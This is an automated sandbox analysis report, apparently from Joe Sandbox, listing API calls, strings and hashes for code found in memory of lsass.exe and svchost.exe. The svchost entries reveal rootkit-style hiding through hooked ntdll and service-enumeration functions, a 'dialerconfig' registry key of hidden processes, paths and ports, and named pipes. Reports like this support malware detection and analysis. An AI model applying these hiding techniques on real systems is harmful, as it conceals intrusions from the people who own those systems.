Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: c1244e4e5751e4e33ab54398f15f8768373e8bd3d7510e7b3c46aef1a1838649
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 81110836608BC0C6EB60CB16B48829AB7A4F7C9B90F554127EFDD83B5ADF38C4548B04

Function 00000202C0AE94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000202C0AE94E8
RaiseException.KERNEL32 ref: 00000202C0AE952E

Strings

csm, xrefs: 00000202C0AE951B

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 5ec152f602f6614b10d7d61dc62558a14f1fa2edeb9862266148b608519f7d2f
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: D4114C32208B8082EB618F15E48825D77A0F788B98F194226DFDD0BB69DF39C569CB04

Function 00000202C0AED65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000202C0AED68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000202C0AED6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000202C0AED681

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 923404b4932ecc71181cb30068a9546cc491521e033fc7284cfb6fd6de67006a
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 4EF08223314B80D2FB059B41F48C69D7321AB88B90F4A5127EB9907B56CE3AC9ADD704

Function 00000202C0ABCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000202C0ABCBC5

Strings

November, xrefs: 00000202C0ABCBA8, 00000202C0ABCBB2
October, xrefs: 00000202C0ABCBBE

Memory Dump Source

Source File: 00000008.00000002.3012950284.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ab0000_lsass.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 679e5424aa469e90ece3b8af143238a50df9fedd07725b9b320bb21ab3ca171a
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 41E09231200B41E6FA049B51F4CD6ED23219B84740F5F5123975906253CE38C8CE8344

Function 00000202C0AED608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000202C0AED631
TlsSetValue.KERNEL32 ref: 00000202C0AED648

Strings

FlsSetValue, xrefs: 00000202C0AED61E

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: d7467d53a769e4656bbbe4c3d3afebbbd9307ba23a939249af377e23a7e14c26
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 7DE06D63214780D2FF044B50F88C6AC2222BB88780F4A4123DB690A297DE39C86DC704

Function 00000202C0AE1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000202C0AE1D9B
HeapAlloc.KERNEL32 ref: 00000202C0AE1DAA
GetProcessHeap.KERNEL32 ref: 00000202C0AE1E1E
HeapFree.KERNEL32 ref: 00000202C0AE1E2C

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 28ae63f6c094da995c863b700c8ad089c3ad79b3e7b2f39ac27c3d30d7f83160
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: F2217133604BD0C1FB118F5AA44C26EB3A0FB88B94F0A4113EF9C47B16EB78C55A8700

Function 00000202C0AE1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000202C0AE127A
HeapAlloc.KERNEL32 ref: 00000202C0AE1289
GetProcessHeap.KERNEL32 ref: 00000202C0AE12A3
HeapAlloc.KERNEL32 ref: 00000202C0AE12B4

Memory Dump Source

Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 04370fa5f8d30b2195b99abe6e113b6bf610919fa5c6b82f6a71ca1cb9b5a3fa
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 13E03973611700C6FB048B62D84C35936E1EB88B41F4A8126CA0907351DF7E8499C740

Analysis Process: svchost.exePID: 920, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 000002A661303458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002A66130347A
PathFindFileNameW.SHLWAPI ref: 000002A661303489

Part of subcall function 000002A661303930: StrCmpNIW.SHLWAPI ref: 000002A661303948

Part of subcall function 000002A661303878: GetModuleHandleW.KERNEL32 ref: 000002A661303886
Part of subcall function 000002A661303878: GetCurrentProcess.KERNEL32 ref: 000002A6613038B4
Part of subcall function 000002A661303878: VirtualProtectEx.KERNEL32 ref: 000002A6613038D6
Part of subcall function 000002A661303878: GetCurrentProcess.KERNEL32 ref: 000002A6613038F4
Part of subcall function 000002A661303878: VirtualProtectEx.KERNEL32 ref: 000002A661303915

CreateThread.KERNEL32 ref: 000002A6613034D7

Part of subcall function 000002A661301EB4: GetCurrentThread.KERNEL32 ref: 000002A661301EBF

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: d58425ed8a59d5428c8ef40dad0f60b78ff9bcff066837ae15f2104d75efcea5
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 18115B74F106018BFB22D721A84FB6A32DCA756F46F4D00259A0BBB594EF3DC04C8282

Function 000002A661301C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002A661301650: GetProcessHeap.KERNEL32 ref: 000002A66130165B
Part of subcall function 000002A661301650: HeapAlloc.KERNEL32 ref: 000002A66130166A
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DA
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301707
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301721
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301741
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A66130175C
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A66130177C
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301797
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017B7
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613017D2
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017F2

Sleep.KERNEL32 ref: 000002A661301C43
SleepEx.KERNELBASE ref: 000002A661301C49

Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A66130180D
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A66130182D
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301848
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A661301868
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A661301883
Part of subcall function 000002A661301650: RegOpenKeyExW.ADVAPI32 ref: 000002A6613018A3
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613018BE
Part of subcall function 000002A661301650: RegCloseKey.ADVAPI32 ref: 000002A6613018C8

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 00c3e32f535f1a666752326b103c4686352be0cf57cb2c7f26f20961d7c6380f
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: FB31F075B0060193FB51AF26E94D36A62FDAB46FDAF0C4021DE0BA76D5DF1CC45882D2

Function 000002A661303930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000002A661303948

Strings

dialer, xrefs: 000002A661303941

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 7fe97d79589782e628872070bc3fa000d6e2a9929ce407a7fd10b9c94f4c1939
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: B5D05E20B1124A8BEB14DFA1888E76033A8AB06B15F4C80208A0213114DF1C898DC711

Function 000002A6612D2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002A6612D2A31

Memory Dump Source

Source File: 00000009.00000002.2984385637.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a6612d0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: bfb7080cd5f30ec63c7e1aa02e3938f4a0833d0643ea63299f78d611e02fc58c
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: FD61FDA2F0165187EA68CF29D44876CB39DFF06FA4F588021DA1907785EF3CE896C706

Non-executed Functions

Function 000002A661302CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002A661302D80
lstrlenW.KERNEL32 ref: 000002A661302FBA

Part of subcall function 000002A661301A14: OpenProcess.KERNEL32 ref: 000002A661301A3A
Part of subcall function 000002A661301A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002A661301A58
Part of subcall function 000002A661301A14: PathFindFileNameW.SHLWAPI ref: 000002A661301A67
Part of subcall function 000002A661301A14: lstrlenW.KERNEL32 ref: 000002A661301A73
Part of subcall function 000002A661301A14: StrCpyW.SHLWAPI ref: 000002A661301A86
Part of subcall function 000002A661301A14: CloseHandle.KERNEL32 ref: 000002A661301A94

GetProcAddress.KERNEL32 ref: 000002A661302D95

Part of subcall function 000002A661301554: StrCmpIW.SHLWAPI ref: 000002A661301585

Part of subcall function 000002A661303930: StrCmpNIW.SHLWAPI ref: 000002A661303948

StrCmpNIW.SHLWAPI ref: 000002A661302DD8
lstrlenW.KERNEL32 ref: 000002A661302F00

Strings

ntdll.dll, xrefs: 000002A661302D79
\Device\Nsi, xrefs: 000002A661302DCB
NtQueryObject, xrefs: 000002A661302D8B

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 23cd8f04e71538b5eb9847158c47a201b9a4386d364ecdc48b455eb11579518a
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: B2B18D22B11A5087EB55CF25D54C7A963E8FB46F86F58501AEE0B63B94DF39CC88C381

Function 000002A661307E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002A661307E8C
RtlCaptureContext.NTDLL ref: 000002A661307EB9
RtlLookupFunctionEntry.NTDLL ref: 000002A661307ED3
RtlVirtualUnwind.NTDLL ref: 000002A661307F14
IsDebuggerPresent.KERNEL32 ref: 000002A661307F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002A661307F89
UnhandledExceptionFilter.KERNEL32 ref: 000002A661307F94

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: a5cba665a44c7c07cf1dccde805d8f3e79610c362df98632861a869d0ed45d4e
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 1F315D72705B8096EB60DF60E8483ED73A8F785B54F48442ADA8E57B98EF38C54CC710

Function 000002A66130B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002A66130B585
RtlLookupFunctionEntry.NTDLL ref: 000002A66130B59D
RtlVirtualUnwind.NTDLL ref: 000002A66130B5D8
IsDebuggerPresent.KERNEL32 ref: 000002A66130B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002A66130B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002A66130B626

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: d8417c2ec523aaff61b500a3c85146917342d7b6945cdc37d9ed16cda4c36ab7
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 29319136704F8086DB20CF25E84939E73A8F78ABA4F580116EA9E57B58DF3CC549CB40

Function 000002A66130FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002A66130FF67
WriteFile.KERNEL32 ref: 000002A66131021E
WriteFile.KERNEL32 ref: 000002A661310270
GetLastError.KERNEL32 ref: 000002A661310372
GetLastError.KERNEL32 ref: 000002A6613103D2

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 4b748053efe2aa4dd715676edb3458f9a06d083db582eb8aa2e1b11a5c0e5f8f
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: D0E1E032B04A808BE700CF64D48D2DE7BB5F346B98F584516DE4AA7B99DF38C42AC741

Function 000002A661301650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002A66130165B
HeapAlloc.KERNEL32 ref: 000002A66130166A

Part of subcall function 000002A661301274: GetProcessHeap.KERNEL32 ref: 000002A66130127A
Part of subcall function 000002A661301274: HeapAlloc.KERNEL32 ref: 000002A661301289
Part of subcall function 000002A661301274: GetProcessHeap.KERNEL32 ref: 000002A6613012A3
Part of subcall function 000002A661301274: HeapAlloc.KERNEL32 ref: 000002A6613012B4

RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DA
RegOpenKeyExW.ADVAPI32 ref: 000002A661301707
RegCloseKey.ADVAPI32 ref: 000002A661301721
RegOpenKeyExW.ADVAPI32 ref: 000002A661301741
RegCloseKey.ADVAPI32 ref: 000002A66130175C
RegOpenKeyExW.ADVAPI32 ref: 000002A66130177C
RegCloseKey.ADVAPI32 ref: 000002A661301797
RegOpenKeyExW.ADVAPI32 ref: 000002A6613017B7
RegCloseKey.ADVAPI32 ref: 000002A6613017D2
RegOpenKeyExW.ADVAPI32 ref: 000002A6613017F2
RegCloseKey.ADVAPI32 ref: 000002A66130180D
RegOpenKeyExW.ADVAPI32 ref: 000002A66130182D
RegCloseKey.ADVAPI32 ref: 000002A661301848
RegOpenKeyExW.ADVAPI32 ref: 000002A661301868
RegCloseKey.ADVAPI32 ref: 000002A661301883
RegOpenKeyExW.ADVAPI32 ref: 000002A6613018A3
RegCloseKey.ADVAPI32 ref: 000002A6613018BE
RegCloseKey.ADVAPI32 ref: 000002A6613018C8

Part of subcall function 000002A6613012C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002A661301326
Part of subcall function 000002A6613012C8: GetProcessHeap.KERNEL32 ref: 000002A661301334
Part of subcall function 000002A6613012C8: HeapAlloc.KERNEL32 ref: 000002A661301345
Part of subcall function 000002A6613012C8: RegEnumValueW.ADVAPI32 ref: 000002A6613013A1
Part of subcall function 000002A6613012C8: GetProcessHeap.KERNEL32 ref: 000002A6613013E9
Part of subcall function 000002A6613012C8: HeapAlloc.KERNEL32 ref: 000002A6613013F7
Part of subcall function 000002A6613012C8: GetProcessHeap.KERNEL32 ref: 000002A66130141B
Part of subcall function 000002A6613012C8: HeapFree.KERNEL32 ref: 000002A661301429
Part of subcall function 000002A6613012C8: lstrlenW.KERNEL32 ref: 000002A661301432
Part of subcall function 000002A6613012C8: GetProcessHeap.KERNEL32 ref: 000002A661301440
Part of subcall function 000002A6613012C8: HeapAlloc.KERNEL32 ref: 000002A66130144E

Strings

paths, xrefs: 000002A6613017B0
pid, xrefs: 000002A66130173A
tcp_remote, xrefs: 000002A661301861
SOFTWARE\dialerconfig, xrefs: 000002A6613016BA
startup, xrefs: 000002A6613016FD
service_names, xrefs: 000002A6613017EB
tcp_local, xrefs: 000002A661301826
udp, xrefs: 000002A66130189C
process_names, xrefs: 000002A661301775

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 500288821ed10b0b1a9fdc2d981699a51519602a79c13b7e50a4a9ec7bc15a24
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 2971F576B10A5086EB10DF65E88D69937F8FB8AF9DF081121DA4F67A28DF38C549C341

Function 000002A6613012C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002A661301326
GetProcessHeap.KERNEL32 ref: 000002A661301334
HeapAlloc.KERNEL32 ref: 000002A661301345
RegEnumValueW.ADVAPI32 ref: 000002A6613013A1

Part of subcall function 000002A661301554: StrCmpIW.SHLWAPI ref: 000002A661301585

GetProcessHeap.KERNEL32 ref: 000002A6613013E9
HeapAlloc.KERNEL32 ref: 000002A6613013F7
GetProcessHeap.KERNEL32 ref: 000002A66130141B
HeapFree.KERNEL32 ref: 000002A661301429
lstrlenW.KERNEL32 ref: 000002A661301432
GetProcessHeap.KERNEL32 ref: 000002A661301440
HeapAlloc.KERNEL32 ref: 000002A66130144E
StrCpyW.SHLWAPI ref: 000002A661301470
GetProcessHeap.KERNEL32 ref: 000002A661301485
HeapFree.KERNEL32 ref: 000002A661301493

Strings

d, xrefs: 000002A661301365

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: df57f9b9fcc86950589ce138aa7a0377636607729903278f6d4bc0027d70b6ca
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: F9515972B14B4493EB14DB62E54D39AB7B9F78AF94F088124DA8A17B24DF3CC059C741

Function 000002A661301EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002A661301EBF

Part of subcall function 000002A661302174: GetModuleHandleA.KERNEL32 ref: 000002A66130218C
Part of subcall function 000002A661302174: GetProcAddress.KERNEL32 ref: 000002A66130219D

Part of subcall function 000002A661305C10: GetCurrentThreadId.KERNEL32 ref: 000002A661305C4B

Strings

NtQuerySystemInformation, xrefs: 000002A661301EE5
sechost.dll, xrefs: 000002A661301FD9
NtEnumerateKey, xrefs: 000002A661301F59
EnumServicesStatusExW, xrefs: 000002A661301FB1, 000002A661301FD2
EnumServiceGroupW, xrefs: 000002A661301F90
NtQueryDirectoryFileEx, xrefs: 000002A661301F3C
ntdll.dll, xrefs: 000002A661301ECD
NtQueryDirectoryFile, xrefs: 000002A661301F1F
NtDeviceIoControlFile, xrefs: 000002A661301FF6
NtResumeThread, xrefs: 000002A661301F02
advapi32.dll, xrefs: 000002A661301F97, 000002A661301FB8
NtEnumerateValueKey, xrefs: 000002A661301F76

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: e83984e6cd47dee7b92e0930eaa5e7c94e4c88081b7f63715ee1e9d06479c404
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: C231C569B00A4AA3FA09EB65ED5E6D53379A746F46F8C5423D40B335719F3C828DC382

Function 000002A6613023F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002A661302405
GetCurrentProcessId.KERNEL32 ref: 000002A66130240F

Part of subcall function 000002A6613019AC: OpenProcess.KERNEL32 ref: 000002A6613019CA
Part of subcall function 000002A6613019AC: IsWow64Process.KERNEL32 ref: 000002A6613019E0
Part of subcall function 000002A6613019AC: CloseHandle.KERNEL32 ref: 000002A6613019FB

CreateFileW.KERNEL32 ref: 000002A661302468
WriteFile.KERNEL32 ref: 000002A661302490
ReadFile.KERNEL32 ref: 000002A6613024AF
CloseHandle.KERNEL32 ref: 000002A6613024B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002A661302438
\\.\pipe\dialerchildproc32, xrefs: 000002A66130243F

Memory Dump Source

Source File: 00000009.00000002.2985681750.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a661300000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 132fcfba970474944b12d8b7567ee438171c688ab5bdda6d84782a329f9c713f
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
